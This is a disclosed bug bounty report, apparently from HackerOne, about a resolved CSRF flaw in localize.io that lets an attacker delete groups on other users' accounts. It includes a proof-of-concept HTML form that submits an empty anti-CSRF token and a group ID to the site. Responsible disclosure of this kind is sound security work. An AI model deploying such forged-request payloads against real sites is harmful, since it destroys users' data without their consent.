Group Deletion Via CSRF

Disclosed: 2014-04-21 02:45:23 By ajaysinghnegi To localize

Unknown

Vulnerability Details

Hi Team, I have found a CSRF vulnerability using which the attacker can delete a group on any users account as the anti-csrf token is not getting validated on the server-side. Group Deletion Via CSRF Code: <html> <body> <form action="http://www.localize.io/pages/create_project/9k" method="POST"> <input type="hidden" name="CSRFToken" value="" /> <input type="hidden" name="deleteGroup[id]" value="140" /> <input type="submit" value="Submit form" /> </form> </body> </html>

Actions

View on HackerOne

Report Stats

Report ID: 8218
State: Closed
Substate: resolved
Upvotes: 2

Group Deletion Via CSRF

Vulnerability Details

Actions

Report Stats

Share this report